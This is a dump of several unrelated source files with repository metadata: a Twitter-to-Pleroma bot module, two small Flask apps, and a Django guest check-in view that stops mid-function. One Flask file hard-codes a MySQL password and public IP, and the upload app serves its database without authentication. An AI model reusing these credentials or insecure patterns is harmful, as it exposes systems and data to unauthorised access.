verify=None, cert=None, json=None, retries=0):
response = requests.request(
method=method.upper(),
url=url,
headers=headers,
files=files,
data=data or {},
json=json,
params=params or {},
auth=auth,
cookies=cookies,
hooks=hooks,
)
max_retries = 5
if response.status_code == 429:
remaining_header = response.headers.get('x-rate-limit-remaining')
reset_header = response.headers.get('x-rate-limit-reset')
limit_header = response.headers.get('x-rate-limit-limit')
if self.guest: # pragma: todo
logger.warning(
_(
"Rate limit exceeded when using a guest token. "
"Refreshing token and retrying..."
)
)
guest_token, headers = self._get_guest_token_header()
self.twitter_token = guest_token
self.header_twitter = headers
response = requests.request(
method=method.upper(),
url=url,
headers=headers,
files=files,
data=data or {},
json=json,
params=params or {},
auth=auth,
cookies=cookies,
hooks=hooks,
)
if response.status_code == 429 and self.proxy:
logger.warning(
_(
"Rate limit exceeded when using a guest token. "
"Retrying with a proxy..."
)
)
retries += 1
if retries <= max_retries:
response = self._request_proxy(
method, url, params=params,
data=data, headers=headers,
cookies=cookies, files=files,
auth=auth, hooks=hooks,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
stream=stream, verify=verify,
cert=cert, json=json, retries=retries
)
elif remaining_header and reset_header and limit_header:
limit = int(limit_header)
remaining = int(remaining_header)
reset = int(reset_header)
reset_time = datetime.utcfromtimestamp(reset)
logger.info(_(
"Rate limit exceeded. {} out of {} requests remaining until {}"
" UTC"
).format(remaining, limit, reset_time))
delay = (reset_time - datetime.utcnow()).total_seconds() + 2
logger.info(_("Sleeping for {}s...").format(round(delay)))
time.sleep(delay)
response = self.twitter_api_request(
method, url, params=params,
data=data, headers=headers,
cookies=cookies, files=files,
auth=auth, hooks=hooks,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
stream=stream, verify=verify,
cert=cert, json=json
)
elif response.status_code == 503 and retries <= max_retries: # pragma
retries += 1
logger.warning(
_(
"Received HTTP 503 - {}"
" Retrying... {}/{}"
).format(response.text, retries, max_retries)
)
time.sleep(0.5 * retries)
response = self.twitter_api_request(
method, url, params=params,
data=data, headers=headers,
cookies=cookies, files=files,
auth=auth, hooks=hooks,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
stream=stream, verify=verify,
cert=cert, json=json, retries=retries
)
return response
def _get_twitter_info_guest(self): # pragma: todo
from pleroma_bot._processing import _expand_urls
for t_user in self.twitter_username:
twitter_user_url = (
f"{self.twitter_base_url}"
f"/users/show.json?screen_name="
f"{t_user}"
)
response = requests.get(
twitter_user_url, headers=self.header_twitter, auth=self.auth
)
if not response.ok:
response.raise_for_status()
user_twitter = response.json()
bio_text = user_twitter["description"]
# Expand bio urls if possible
if self.twitter_bio:
bio_short = user_twitter["description"]
bio = {'text': user_twitter["description"], 'entities': None}
bio_long = _expand_urls(self, bio)
max_len = self.max_post_length
len_bio = len(f"{self.bio_text['_generic_bio_text']}{bio_long}")
bio_text = bio_long if len_bio < max_len else bio_short
self.bio_text[t_user] = (
f"{self.bio_text['_generic_bio_text']}{bio_text}"
if self.twitter_bio
else f"{self.bio_text['_generic_bio_text']}"
)
# Check if user has profile image
if "profile_image_url_https" in user_twitter.keys():
profile_img = user_twitter["profile_image_url_https"]
self.profile_image_url[t_user] = profile_img
# Check if user has banner image
if "profile_banner_url" in user_twitter.keys():
base_banner_url = user_twitter["profile_banner_url"]
self.profile_banner_url[t_user] = f"{base_banner_url}/1500x500"
self.display_name[t_user] = user_twitter["name"]
self.twitter_ids[user_twitter["id"]] = user_twitter["screen_name"]
if "entities" in user_twitter:
if "url" in user_twitter["entities"]:
wb = user_twitter["entities"]["url"]["urls"][0]["expanded_url"]
self.website = wb
if "pinned_tweet_ids" in user_twitter:
if len(user_twitter["pinned_tweet_ids_str"]) > 0:
self.pinned_tweet_id = user_twitter["pinned_tweet_ids_str"][0]
else:
self.pinned_tweet_id = None
def _get_twitter_info(self):
"""Updates User object attributes with current Twitter info
This includes:
* Bio text
* Profile image url
* Banner image url
* Screen name
:return: None
"""
from pleroma_bot._processing import _expand_urls
if self.archive:
return
if self.guest: # pragma: todo
self._get_twitter_info_guest()
return
for t_user in self.twitter_username:
url = f"{self.twitter_base_url_v2}/users/by/username/{t_user}"
params = {}
params.update(
{
"user.fields": "created_at,description,entities,id,location,"
"name,pinned_tweet_id,profile_image_url,"
"protected,url,username,verified,withheld",
"expansions": "pinned_tweet_id",
"tweet.fields": "attachments,author_id,"
"context_annotations,conversation_id,"
"created_at,entities,"
"geo,id,in_reply_to_user_id,lang,"
"public_metrics,"
"possibly_sensitive,referenced_tweets,"
"source,text,"
"withheld",
}
)
response = self.twitter_api_request(
'GET',
url,
headers=self.header_twitter,
auth=self.auth,
params=params
)
if not response.ok:
response.raise_for_status()
user = response.json()["data"]
bio_text = user["description"]
# Expand bio urls if possible
if self.twitter_bio:
user_entities = user["entities"] if "entities" in user else None
bio_short = user["description"]
bio = {'text': user['description'], 'entities': user_entities}
bio_long = _expand_urls(self, bio)
max_len = self.max_post_length
len_bio = len(f"{self.bio_text['_generic_bio_text']}{bio_long}")
bio_text = bio_long if len_bio < max_len else bio_short
self.bio_text[t_user] = (
f"{self.bio_text['_generic_bio_text']}{bio_text}"
if self.twitter_bio
else f"{self.bio_text['_generic_bio_text']}"
)
# Get website
if "entities" in user and "url" in user["entities"]:
self.website = user['entities']['url']['urls'][0]['expanded_url']
# Check if user has profile image
if "profile_image_url" in user.keys():
# Get the highest quality possible
profile_img_url = user["profile_image_url"].replace("_normal", "")
self.profile_image_url[t_user] = profile_img_url
self.display_name[t_user] = user["name"]
self.twitter_ids[user["id"]] = user["username"]
# TODO: Migrate to v2 when profile_banner is available users endpoint
twitter_user_url = (
f"{self.twitter_base_url}"
f"/users/show.json?screen_name="
f"{t_user}"
)
response = self.twitter_api_request(
'GET',
twitter_user_url,
headers=self.header_twitter,
auth=self.auth
)
if not response.ok:
response.raise_for_status()
user = response.json()
# Check if user has banner image
if "profile_banner_url" in user.keys():
base_banner_url = user["profile_banner_url"]
self.profile_banner_url[t_user] = f"{base_banner_url}/1500x500"
return
def _package_tweet_v2(tweet_v1): # pragma: todo
include_users = None
entities = None
tweet_v1["text"] = tweet_v1["full_text"]
tweet_v1["id"] = str(tweet_v1["id"])
date_twitter = datetime.strftime(
datetime.strptime(
tweet_v1["created_at"], '%a %b %d %H:%M:%S +0000 %Y'
),
'%Y-%m-%dT%H:%M:%S.000Z'
)
tweet_v1["created_at"] = date_twitter
if "possibly_sensitive" not in tweet_v1.keys():
tweet_v1["possibly_sensitive"] = False
if "user_id_str" in tweet_v1.keys():
tweet_v1["author_id"] = tweet_v1["user_id_str"]
if "user" in tweet_v1.keys():
tweet_v1["author_id"] = tweet_v1["user"]["id_str"]
retweet_id = None
quote_id = None
reply_id = None
if "user" in tweet_v1.keys():
tweet_v1["user"]["id"] = tweet_v1["user"]["id_str"]
tweet_v1["user"]["username"] = tweet_v1["user"]["screen_name"]
include_users = [tweet_v1["user"]]
if "retweeted_status_id_str" in tweet_v1.keys():
retweet_id = tweet_v1["retweeted_status_id_str"]
if "quoted_status_id_str" in tweet_v1.keys():
quote_id = tweet_v1["quoted_status_id_str"]
if "in_reply_to_status_id_str" in tweet_v1.keys():
reply_id = tweet_v1["in_reply_to_status_id_str"]
if quote_id or reply_id or retweet_id:
tweet_v1["referenced_tweets"] = []
if retweet_id:
rt = {"id": retweet_id, "type": "retweeted"}
tweet_v1["referenced_tweets"].append(rt)
if reply_id:
reply = {"id": reply_id, "type": "replied_to"}
tweet_v1["referenced_tweets"].append(reply)
if quote_id:
quoted_tw = {"id": quote_id, "type": "quoted"}
tweet_v1["referenced_tweets"].append(quoted_tw)
if "entities" in tweet_v1:
entities = tweet_v1["entities"]
card = {}
tweet_v1["polls"] = {}
if "card" in tweet_v1.keys():
tw_card = tweet_v1["card"]
if "binding_values" in tw_card.keys():
b_v = tw_card["binding_values"]
if tw_card["name"].startswith("poll"):
k = "string_value"
poll_opts = [b_v[c][k] for c in b_v if c.endswith("_label")]
duration = b_v['duration_minutes']['string_value']
pleroma_poll = {
"options": poll_opts,
"expires_in": int(duration) * 60,
}
tweet_v1["polls"] = pleroma_poll
if "unified_card" in b_v.keys():
u_c = b_v["unified_card"]
if "string_value" in u_c:
card = json.loads(u_c["string_value"])
if "destination_objects" in card:
try:
d_o = card["destination_objects"]
b_1 = d_o["browser_1"]
dt = b_1["data"]
url_dt = dt["url_data"]
url = url_dt["url"]
tweet_v1["text"] = f'{tweet_v1["text"]}\n{url}'
except KeyError:
pass
if "media_entities" in card.keys():
if "extended_entities" not in tweet_v1.keys():
tweet_v1.update({"extended_entities": {}})
tw_ext_entities = tweet_v1["extended_entities"]
if "media" not in tw_ext_entities:
tw_ext_entities.update({"media": []})
if "media" not in entities:
if entities is None:
entities = {"media": []}
else:
entities.update({"media": []})
for media in card['media_entities']:
entities["media"].append(card['media_entities'][media])
tw_ext_entities["media"].append(card['media_entities'][media])
return include_users, entities, tweet_v1
def _package_tweets_v2(tweets_v1, author_ids): # pragma: todo
tweets = {"data": [], "includes": {}}
if isinstance(tweets_v1, dict):
include_users, entities, tweet_v2 = _package_tweet_v2(tweets_v1)
tweets["data"] = tweets_v1
if include_users:
tweets["includes"]["users"] = include_users
if entities:
for entity in entities:
tweets["includes"][entity] = tweet_v2["entities"][entity]
else:
for tweet_v1 in tweets_v1:
if tweet_v1["user_id"] not in author_ids:
continue
include_users, entities, tweet_v2 = _package_tweet_v2(tweet_v1)
tweets["data"].append(tweet_v2)
if include_users:
tweets["includes"]["users"] = include_users
if entities:
for entity in entities:
tweets["includes"][entity] = tweet_v2["entities"][entity]
tweets["data"] = sorted(
tweets["data"], key=lambda i: i["id"], reverse=True
)
tweets["meta"] = {"result_count": len(tweets["data"])}
return tweets
def _get_tweets(
self,
version: str,
tweet_id=None,
start_time=None,
t_user=None,
pbar=None):
"""Gathers last 'max_tweets' tweets from the user and returns them
as a dict
:param version: Twitter API version to use to retrieve the tweets
:type version: string
:param tweet_id: Tweet ID to retrieve
:type tweet_id: int
:returns: last 'max_tweets' tweets
:rtype: dict
"""
if version == "v1.1" or self.guest:
if tweet_id:
twitter_status_url = (
f"{self.twitter_base_url}/statuses/"
f"show.json?id={str(tweet_id)}"
)
param = {
"include_profile_interstitial_type": "1",
"include_blocking": "1",
"include_blocked_by": "1",
"include_followed_by": "1",
"include_want_retweets": "1",
"include_mute_edge": "1",
"include_can_dm": "1",
"include_can_media_tag": "1",
"skip_status": "1",
"cards_platform": "Web-12",
"include_cards": "1",
"include_ext_alt_text": "true",
"include_quote_count": "true",
"include_reply_count": "1",
"tweet_mode": "extended",
"include_entities": "true",
"include_user_entities": "true",
"include_ext_media_color": "true",
"include_ext_media_availability": "true",
"send_error_codes": "true",
"simple_quoted_tweet": "true",
"query_source": "typed_query",
"spelling_corrections": "1",
"ext": "mediaStats,highlightedLabel",
}
if self.guest: # pragma: todo
param.update({"pc": "1"})
response = self.twitter_api_request(
'GET',
twitter_status_url,
params=param,
headers=self.header_twitter,
auth=self.auth
)
if not response.ok:
if response.status_code == 404: # pragma: todo
logger.warning(
_(
"Received HTTP 404 when trying to get tweet."
" Tweet deleted? Skipping..."
)
)
return None
response.raise_for_status()
tweet = response.json()
if self.guest: # pragma: todo
tweet_v2 = _package_tweets_v2(tweet, self.twitter_ids)
tweet = tweet_v2
return tweet
else:
for t_user in self.twitter_username:
if not self.guest:
twitter_status_url = (
f"{self.twitter_base_url}"
f"/statuses/user_timeline.json?screen_name="
f"{t_user}"
f"&count={str(self.max_tweets)}&include_rts=true"
)
response = self.twitter_api_request(
'GET',
twitter_status_url,
headers=self.header_twitter,
auth=self.auth
)
if not response.ok:
response.raise_for_status()
tweets = response.json()
else: # pragma: todo
now_ts = int(datetime.now(tz=timezone.utc).timestamp())
fmt_date = ("%Y-%m-%dT%H:%M:%S.%fZ", "%Y-%m-%dT%H:%M:%SZ")
for fmt in fmt_date:
try:
start_time_ts = int(datetime.strptime(
start_time, fmt
).replace(tzinfo=timezone.utc).timestamp())
except ValueError:
pass
rts = ""
if self.include_rts:
rts = "include:nativeretweets"
query = (
f"(from:{t_user}) "
f"since_time:{start_time_ts} until_time:{now_ts} {rts}"
)
param = {
"include_profile_interstitial_type": "1",
"include_rts": {str(self.include_rts).lower()},
"include_replies": {str(self.include_replies).lower()},
"include_quotes": {str(self.include_quotes).lower()},
"include_blocking": "1",
"include_blocked_by": "1",
"include_followed_by": "1",
"include_want_retweets": "1",
"include_mute_edge": "1",
"include_can_dm": "1",
"include_can_media_tag": "1",
"skip_status": "1",
"cards_platform": "Web-12",
"include_cards": "1",
"include_ext_alt_text": "true",
"include_quote_count": "true",
"include_reply_count": "1",
"tweet_mode": "extended",
"include_entities": "true",
"include_user_entities": "true",
"include_ext_media_color": "true",
"include_ext_media_availability": "true",
"send_error_codes": "true",
"simple_quoted_tweet": "true",
"q": query,
"count": str(self.max_tweets),
"query_source": "typed_query",
"pc": "1",
"spelling_corrections": "1",
"ext": "mediaStats,highlightedLabel",
"tweet_search_mode": "live",
}
tweets_guest = self._get_tweets_guest(param, pbar)
tweets = []
for tweet in tweets_guest:
tweets.append(tweets_guest[tweet])
tweets_v2 = _package_tweets_v2(tweets, self.twitter_ids)
tweets = tweets_v2
return tweets
elif version == "v2":
tweets_v2 = self._get_tweets_v2(
tweet_id=tweet_id, start_time=start_time, t_user=t_user, pbar=pbar
)
return tweets_v2
else:
raise ValueError(_("API version not supported: {}").format(version))
def _get_tweets_guest(
self, param=None, pbar=None, tweets=None, retries=None
): # pragma: todo
if tweets is None:
tweets = {}
if retries is None:
retries = 0
max_retries = 5
search_url = (
"https://twitter.com/i/api/2/search/adaptive.json"
)
response = self.twitter_api_request(
'GET',
search_url,
headers=self.header_twitter,
params=param,
)
resp_json = response.json()
tweets_guest = resp_json["globalObjects"]["tweets"]
insts = resp_json['timeline']['instructions']
entries = None
cursor = None
direction = "bottom"
for idx, inst in enumerate(insts):
if "addEntries" in insts[idx]:
entries = insts[idx]["addEntries"]["entries"]
elif "replaceEntry" in insts[idx]:
entry = insts[idx]["replaceEntry"]["entry"]
if entry['entryId'].startswith(f"sq-cursor-{direction}"):
entries = [entry]
if entries:
for idx, entry in enumerate(entries):
if entry['entryId'].startswith(f"sq-cursor-{direction}"):
cursor = entry["content"]["operation"]["cursor"]["value"]
self.result_count += len(tweets_guest)
if pbar:
pbar.update(len(tweets_guest))
tweets.update(tweets_guest)
if cursor:
if "cursor" in param:
if param["cursor"] == cursor or len(tweets_guest) == 0:
retries += 1
param.update({"cursor": cursor})
if retries <= max_retries:
tweets_guest = self._get_tweets_guest(param, pbar, tweets, retries)
tweets.update(tweets_guest)
return tweets
def _get_tweets_v2(
self,
start_time,
tweet_id=None,
next_token=None,
previous_token=None,
count=0,
tweets_v2=None,
t_user=None,
pbar=None
):
if not (3200 >= self.max_tweets >= 10):
global _
error_msg = _(
"max_tweets must be between 10 and 3200. max_tweets: {}"
).format(self.max_tweets)
raise ValueError(error_msg)
params = {}
previous_token = next_token
max_tweets = self.max_tweets
diff = max_tweets - count
if diff == 0 or diff < 0:
return tweets_v2
# Tweet number must be between 10 and 100 for search
if count:
max_results = diff if diff < 100 else 100
else:
max_results = max_tweets if 100 > self.max_tweets > 10 else 100
# round up max_results to the nearest 10
max_results = (max_results + 9) // 10 * 10
if tweet_id:
url = f"{self.twitter_base_url_v2}/tweets/{tweet_id}"
params.update(
{
"poll.fields": "duration_minutes,end_datetime,id,options,"
"voting_status",
"media.fields": "duration_ms,height,media_key,"
"preview_image_url,type,url,width,"
"public_metrics,alt_text",
"expansions": "attachments.poll_ids,"
"attachments.media_keys,author_id,"
"entities.mentions.username,geo.place_id,"
"in_reply_to_user_id,referenced_tweets.id,"
"referenced_tweets.id.author_id",
"tweet.fields": "attachments,author_id,"
"context_annotations,conversation_id,"
"created_at,entities,"
"geo,id,in_reply_to_user_id,lang,"
"public_metrics,"
"possibly_sensitive,referenced_tweets,"
"source,text,"
"withheld",
}
)
response = self.twitter_api_request(
'GET',
url,
headers=self.header_twitter,
auth=self.auth,
params=params
)
if not response.ok:
response.raise_for_status()
response = response.json()
return response
else:
params.update({"max_results": max_results})
url = (
f"{self.twitter_base_url_v2}/users/by?"
f"usernames={t_user}"
)
response = self.twitter_api_request(
'GET', url, headers=self.header_twitter, auth=self.auth
)
if not response.ok:
response.raise_for_status()
response = response.json()
twitter_user_id = response["data"][0]["id"]
url = f"{self.twitter_base_url_v2}/users/{twitter_user_id}/tweets"
if next_token:
params.update({"pagination_token": next_token})
params.update(
{
"start_time": start_time,
}
)
params.update(
{
"poll.fields": "duration_minutes,end_datetime,id,options,"
"voting_status",
"media.fields": "duration_ms,height,media_key,"
"preview_image_url,type,url,width,"
"public_metrics,alt_text",
"expansions": "attachments.poll_ids,"
"attachments.media_keys,author_id,"
"entities.mentions.username,geo.place_id,"
"in_reply_to_user_id,referenced_tweets.id,"
"referenced_tweets.id.author_id",
"tweet.fields": "attachments,author_id,"
"context_annotations,conversation_id,"
"created_at,entities,"
"geo,id,in_reply_to_user_id,lang,"
"public_metrics,"
"possibly_sensitive,referenced_tweets,"
"source,text,"
"withheld",
}
)
response = self.twitter_api_request(
'GET', url, headers=self.header_twitter, params=params, auth=self.auth
)
if not response.ok:
response.raise_for_status()
if tweets_v2:
# TODO: Tidy up this mess
next_tweets = response.json()
includes = ["users", "tweets", "media", "polls"]
for include in includes:
try:
_ = tweets_v2["includes"][include]
except KeyError:
tweets_v2["includes"].update({include: []})
try:
_ = next_tweets["includes"][include]
except KeyError:
next_tweets["includes"].update({include: []})
for tweet in next_tweets["data"]:
tweets_v2["data"].append(tweet)
for user in next_tweets["includes"]["users"]:
tweets_v2["includes"]["users"].append(user)
for tweet_include in next_tweets["includes"]["tweets"]:
tweets_v2["includes"]["tweets"].append(tweet_include)
for media in next_tweets["includes"]["media"]:
tweets_v2["includes"]["media"].append(media)
for poll in next_tweets["includes"]["polls"]:
tweets_v2["includes"]["polls"].append(poll)
tweets_v2["meta"] = next_tweets["meta"]
else:
tweets_v2 = response.json()
if pbar:
pbar.update(response.json()["meta"]["result_count"])
try:
next_token = response.json()["meta"]["next_token"]
count += response.json()["meta"]["result_count"]
if next_token and next_token != previous_token:
self._get_tweets_v2(
start_time=start_time,
tweets_v2=tweets_v2,
next_token=next_token,
previous_token=previous_token,
count=count,
t_user=t_user,
pbar=pbar
)
except KeyError:
pass
return tweets_v2
# @spinner(_("Gathering tweets... "))
def get_tweets(self, start_time):
from .i18n import _
t_utweets = {}
self.result_count = 0
tweets_merged = {
"data": [],
"includes": {},
}
try:
for t_user in self.twitter_username:
desc = _("Gathering tweets... ")
fmt = '{desc}{n_fmt}'
pbar = tqdm(desc=desc, position=0, total=10000, bar_format=fmt)
t_utweets[t_user] = self._get_tweets(
"v2",
start_time=start_time,
t_user=t_user,
pbar=pbar
)
pbar.close()
self.result_count += t_utweets[t_user]["meta"]["result_count"]
tweets_merged["meta"] = {}
for user in t_utweets:
includes = ["users", "tweets", "media", "polls"]
for include in includes:
try:
_ = t_utweets[user]["includes"][include]
except KeyError:
t_utweets[user]["includes"].update({include: []})
_ = t_utweets[user]["includes"][include]
for include in includes:
try:
_ = tweets_merged["includes"][include]
except KeyError:
tweets_merged["includes"].update({include: []})
_ = tweets_merged["includes"][include]
tweets_merged["data"].extend(t_utweets[user]["data"])
for in_user in t_utweets[user]["includes"]["users"]:
tweets_merged["includes"]["users"].append(in_user) # pragma
for tweet_include in t_utweets[user]["includes"]["tweets"]:
tweets_merged["includes"]["tweets"].append(tweet_include)
for media in t_utweets[user]["includes"]["media"]:
tweets_merged["includes"]["media"].append(media)
for poll in t_utweets[user]["includes"]["polls"]:
tweets_merged["includes"]["polls"].append(poll)
tweets_merged["meta"][user] = t_utweets[user]["meta"]
except KeyError:
pass
return tweets_merged
| robertoszek/pleroma-bot | pleroma_bot/_twitter.py | _twitter.py | py | 32,092 | python | en | code | 98 | github-code | 36 | [
{
"api_name": "requests.request",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pleroma_bot.i18n._",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "requests.request",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "pleroma_bot.i18n... |
15643367692 | from aurora import aurora
import os
import json
from flask import Flask, flash, request, redirect, url_for, render_template, Response
from werkzeug.utils import secure_filename
from db import db
UPLOAD_FOLDER = './sessions'
ALLOWED_EXTENSIONS = set(['zip','csv', 'txt', 'json'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
    """Return True if *filename* has an extension listed in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
importer = aurora.SESSION_IMPORTER()
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
importer.run_import()
return redirect(url_for('index', filename=filename))
return render_template('index.html', title='Welcome')
@app.route('/query', methods=['GET'])
def query():
    """Return all rows of the sessions table as pretty-printed JSON.

    Fix: the previous code ran json.dumps(str(record), indent=2), which
    JSON-encoded the *repr string* of the result set (double encoding, and
    indent had no effect). Serialize the rows themselves; default=str
    covers values that are not natively JSON-serializable (e.g. datetimes).
    """
    query = "SELECT * from sessions"
    record = db.db_query(query)
    return Response(json.dumps(record, indent=2, default=str),
                    mimetype="text/plain")
# Start the development server on all interfaces; close the importer's
# database connection cleanly if the process is interrupted with Ctrl-C.
try:
    app.run(host="0.0.0.0")
except KeyboardInterrupt:
    importer.db_close()
    print ("Quit")
| johnnydev543/aurora-dreamband | run.py | run.py | py | 1,659 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "aurora.aurora.SESSION_IMPORTER",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "aurora.aurora",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.reques... |
74236535463 | from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# Replace 'your-connection-string' with your actual connection string
# SECURITY NOTE(review): database credentials are hard-coded in source and
# point at a public IP; they should be loaded from environment variables or
# a secrets store, and the exposed password rotated.
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://john1:Lucban2101@35.239.116.222/john1'
db = SQLAlchemy(app)
class Item(db.Model):
    """A simple inventory item persisted via SQLAlchemy."""

    id = db.Column(db.Integer, primary_key=True)  # surrogate primary key
    name = db.Column(db.String(255), nullable=False)  # required display name
    description = db.Column(db.String(255))  # optional free text
@app.route('/items', methods=['GET'])
def get_items():
    """Return every stored item as a JSON list of {id, name, description}."""
    serialized = [
        {'id': item.id, 'name': item.name, 'description': item.description}
        for item in Item.query.all()
    ]
    return jsonify(serialized)
@app.route('/items', methods=['POST'])
def create_item():
    """Create an item from the JSON request body; 'name' is required.

    Robustness fix: a payload without 'name' (or a non-JSON body) previously
    raised an unhandled KeyError/TypeError and produced a 500; now it returns
    a 400 with an explanatory message. The success path is unchanged.
    """
    data = request.get_json(silent=True)
    if not data or 'name' not in data:
        return jsonify({'message': "Field 'name' is required"}), 400
    new_item = Item(name=data['name'], description=data.get('description'))
    db.session.add(new_item)
    db.session.commit()
    return jsonify({'message': 'Item created successfully'})
@app.route('/items/<int:item_id>', methods=['PUT'])
def update_item(item_id):
    """Update an existing item; 'name' is required in the JSON body.

    Robustness fix (consistent with create_item): a payload without 'name'
    previously raised an unhandled KeyError and produced a 500; now it
    returns a 400. The success and 404 paths are unchanged.
    """
    item = Item.query.get(item_id)
    if item is None:
        return jsonify({'message': 'Item not found'}), 404
    data = request.get_json(silent=True)
    if not data or 'name' not in data:
        return jsonify({'message': "Field 'name' is required"}), 400
    item.name = data['name']
    item.description = data.get('description')
    db.session.commit()
    return jsonify({'message': 'Item updated successfully'})
@app.route('/items/<int:item_id>', methods=['DELETE'])
def delete_item(item_id):
    """Delete the item with the given id, or return 404 if it does not exist."""
    item = Item.query.get(item_id)
    if item is not None:
        db.session.delete(item)
        db.session.commit()
        return jsonify({'message': 'Item deleted successfully'})
    return jsonify({'message': 'Item not found'}), 404
# Run the Flask development server when executed directly.
# NOTE(review): debug=True exposes the interactive debugger; do not use in
# production.
if __name__ == '__main__':
    app.run(debug=True)
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "flask.request.get... |
23951701787 |
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
from twilio.rest import Client
from sendsms import api
from django.conf import settings
from .models import Host, Clients
from .forms import HostLogin, HostSignUp, ClientRegistration, Checkout
from django.utils import timezone
from django.contrib import messages
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.template.loader import render_to_string
from django.shortcuts import render, redirect, reverse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import login, authenticate, logout
# Function based view for home page
def home(request):
    """Render the static landing page."""
    context = {}
    return render(request, 'home.html', context)
# Function based view for Host Registration
def hostSignup(request):
    """Host registration view: on valid POST, create the auth User plus the
    extended Host profile, flash a success message and redirect back; on GET
    or invalid POST, render the signup form (bound forms show field errors).
    """
    if request.method == "POST":
        form = HostSignUp(request.POST)
        if form.is_valid():
            username = form.cleaned_data.get('username')
            email = form.cleaned_data.get('email')
            password = form.cleaned_data.get('password1')
            phone = form.cleaned_data.get('phone')
            address = form.cleaned_data.get('address')
            user = User.objects.create_user(
                username=username, email=email, password=password)
            # Host extends the auth User with contact details.
            extendedUser = Host(user=user, email=email,
                                phone=phone, address=address)
            extendedUser.save()
            print('Registration done')  # NOTE(review): debug print; use logging
            # NOTE(review): create_user raises on failure rather than
            # returning None, so this guard appears redundant — confirm.
            if user is not None:
                messages.success(request, 'Registration success')
                return redirect(reverse('hostSignup'))
    else:
        form = HostSignUp(None)
    context = {
        "form": form
    }
    return render(request, 'auth/hostSignup.html', context)
# Function based view for Host Login
def hostLogin(request):
    """Host login view: authenticated users are bounced to home; a valid
    POST authenticates and redirects to the client dashboard; failures
    flash an error and redirect back to the login page.
    """
    if request.user.is_authenticated:
        return redirect(reverse('home'))
    if request.method == "POST":
        form = HostLogin(request.POST)
        if form.is_valid():
            username = form.cleaned_data.get('username')
            password = form.cleaned_data.get('password')
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                print('Logged In')  # NOTE(review): debug print; use logging
                return redirect(reverse('god:client'))
            else:
                messages.error(request, 'Invalid username and password')
                return redirect(reverse('hostLogin'))
        else:
            messages.error(request, 'Please fill the form correctly')
            return redirect(reverse('hostLogin'))
    else:
        form = HostLogin(None)
        context = {
            "form": form
        }
        return render(request, "auth/hostLogin.html", context)
@login_required(login_url='hostLogin')
def hostCloseMeeting(request):
    """Log the host out (ending the meeting session) and return home."""
    logout(request)
    return redirect(reverse('home'))
# Function based view for Guest Registration
@login_required(login_url='hostLogin')
def clientRegister(request):
    """Guest check-in view.

    On a valid POST: find-or-create the Clients record, mark it in-meeting
    with fresh check-in/out timestamps, then notify the host by email
    (SendGrid) and SMS (Twilio) before redirecting to the dashboard.
    On GET or invalid POST, render the registration form.
    """
    if request.method == "POST":
        form = ClientRegistration(request.POST)
        print(request.POST)  # NOTE(review): debug print; may log PII
        if form.is_valid():
            name = form.cleaned_data.get('name')
            phone = form.cleaned_data.get('phone')
            email = form.cleaned_data.get('email')
            altUser = Clients.objects.filter(email=email, phone=phone)
            print(altUser)
            if altUser.exists():
                # NOTE(review): a Clients *instance* is passed as the `name`
                # lookup value here, relying on implicit coercion — confirm
                # this matches the model's __str__/field type.
                user = Clients.objects.get(name=altUser[0])
                user.inMeeting = True
                user.checkInTime = timezone.now()
                user.checkOutTime = timezone.now()
                user.save()
            else:
                user = Clients(name=name, phone=phone, email=email)
                user.inMeeting=True
                user.checkInTime = timezone.now()
                user.checkOutTime = timezone.now()
                user.save()
            print(name, phone, email, user)
            print(user.checkInTime, Clients.objects.get(name=user.name).inMeeting)
            if user is not None:
                # Email notification to the host via SendGrid.
                m = "Hey {host}, {guest} just checked-in for the meeting. {guest}'s email is {email} and phone number is {phoneNum}".format(
                    host=request.user.username,
                    guest=user.name,
                    email=user.email,
                    phoneNum=user.phone
                )
                message = Mail(
                    from_email=os.environ.get('DEFAULT_FROM_EMAIL'),
                    to_emails=request.user.email,
                    subject='Check-In from new Guest',
                    html_content=m)
                sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
                response = sg.send(message)
                print(response.status_code, response.body, response.headers)
                print('Email send')
                # SMS notification to the host via Twilio.
                smsContext = {
                    "host": request.user.username,
                    "guestName": user.name,
                    "guestEmail": user.email,
                    "guestPhone": phone
                }
                client = Client(settings.ACCOUNT_SID, settings.AUTH_TOKEN)
                smsBody = render_to_string("snippets/sms.html", smsContext)
                smsPhone = "+{}{}".format(request.user.profile.phone.country_code,
                                          request.user.profile.phone.national_number)
                print(smsBody, smsPhone)
                try:
                    smsMessage = client.messages \
                        .create(
                            body=smsBody,
                            from_=os.environ.get('TWILIO_PHONE_NUMBER'),
                            to=smsPhone
                        )
                    print(smsMessage.sid)
                    print('SMS send')
                except:
                    # NOTE(review): bare except hides all errors (including
                    # programming errors); narrow to the Twilio exception type.
